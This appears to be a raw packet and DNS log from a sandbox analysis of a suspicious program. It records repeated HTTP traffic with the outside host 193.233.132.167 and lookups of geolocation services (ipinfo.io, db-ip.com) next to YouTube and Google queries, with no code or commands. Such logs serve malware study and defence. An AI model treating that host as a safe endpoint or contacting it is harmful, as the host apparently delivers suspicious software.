                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.987972975 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.987982035 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988012075 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988025904 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988051891 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988065958 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988090038 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988116980 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988147020 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988152981 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988187075 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988203049 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988226891 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988245964 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988265991 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988281012 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988305092 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988321066 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988342047 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988358974 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988380909 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988411903 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988420010 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988435984 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988459110 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988475084 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988497019 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988516092 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988535881 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988552094 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988574028 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988590956 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988615990 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988631964 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988655090 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988672018 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988692999 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988715887 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988739967 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988751888 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988784075 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988806963 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988822937 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988828897 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988862991 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988878012 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988902092 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988923073 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988941908 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988961935 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988980055 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.988997936 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989022970 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989053011 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989063025 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989077091 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989114046 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989132881 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989152908 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989167929 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989192009 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989208937 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989234924 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989250898 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989274025 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989290953 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989314079 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989332914 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989351988 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989372969 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989391088 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989408970 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989429951 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989448071 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989470005 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989486933 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989509106 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989530087 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989547968 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989562988 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989586115 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989604950 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989631891 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989650011 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989670038 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989690065 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:13.989708900 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474565029 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474587917 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474606991 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474623919 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474647045 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474651098 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474685907 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474725008 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474739075 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474767923 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474809885 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474819899 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.474858046 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.477250099 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.477292061 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.477313995 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.477330923 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.477340937 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.477371931 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.477380991 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.477413893 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.477422953 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.477462053 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478324890 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478365898 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478389978 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478404999 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478410006 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478446007 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478454113 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478485107 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478496075 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478523970 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478554964 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478565931 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478574991 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478606939 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478615046 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478647947 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478657007 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478687048 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478698015 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478734016 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478743076 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478775978 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478796959 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478818893 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478823900 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478857040 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478866100 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478895903 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478907108 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478935957 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478972912 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.478985071 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479012012 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479022026 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479051113 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479057074 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479091883 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479100943 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479130983 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479145050 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479171038 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479173899 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479208946 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479218006 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479247093 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479254007 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479288101 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479290962 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479326963 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479335070 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479366064 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479374886 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479404926 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479409933 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479444027 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479453087 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479484081 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479491949 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479523897 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479531050 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479563951 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479571104 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479604006 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479612112 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479643106 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479650021 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479682922 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479721069 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479732037 CEST4972080192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:14.479762077 CEST8049720193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465375900 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.465416908 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708439112 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708462000 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708481073 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708498955 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708498001 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708515882 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708528996 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708534956 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708553076 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708570004 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708570957 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708580971 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708587885 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708607912 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708611012 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708625078 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708628893 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708646059 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708662987 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708663940 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708673954 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708683968 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708687067 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708703995 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708708048 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708725929 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708738089 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708744049 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708762884 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708765030 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708780050 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708781958 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708797932 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708805084 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708817959 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708822012 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708837032 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708837986 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708856106 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708857059 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708873987 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708878994 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708893061 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708893061 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708910942 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708914995 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708930016 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708933115 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708946943 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708946943 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708971024 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708975077 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708986998 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.708992958 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709011078 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709016085 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709028959 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709028959 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709048986 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709048986 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709065914 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709065914 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709085941 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709089041 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709103107 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709104061 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709121943 CEST4972280192.168.2.5193.233.132.167
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709122896 CEST8049722193.233.132.167192.168.2.5
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:16.709142923 CEST4972280192.168.2.5193.233.132.167
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Apr 19, 2024 03:29:16.631087065 CEST | 192.168.2.5 | 1.1.1.1 | 0x4547 | Standard query (0) | www.youtube.com | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:16.631237030 CEST | 192.168.2.5 | 1.1.1.1 | 0x9d83 | Standard query (0) | www.youtube.com | 65 | IN (0x0001) | false |
| Apr 19, 2024 03:29:20.929791927 CEST | 192.168.2.5 | 1.1.1.1 | 0x1bb3 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:20.930790901 CEST | 192.168.2.5 | 1.1.1.1 | 0xffc6 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false |
| Apr 19, 2024 03:29:22.300446033 CEST | 192.168.2.5 | 1.1.1.1 | 0xb67e | Standard query (0) | accounts.youtube.com | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:22.301054001 CEST | 192.168.2.5 | 1.1.1.1 | 0xbe10 | Standard query (0) | accounts.youtube.com | 65 | IN (0x0001) | false |
| Apr 19, 2024 03:29:24.697052956 CEST | 192.168.2.5 | 1.1.1.1 | 0xb256 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:25.274893999 CEST | 192.168.2.5 | 1.1.1.1 | 0xd206 | Standard query (0) | db-ip.com | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:31.740859985 CEST | 192.168.2.5 | 1.1.1.1 | 0x32a1 | Standard query (0) | play.google.com | A (IP address) | IN (0x0001) | false |
| Apr 19, 2024 03:29:31.741161108 CEST | 192.168.2.5 | 1.1.1.1 | 0x6a5 | Standard query (0) | play.google.com | 65 | IN (0x0001) | false |
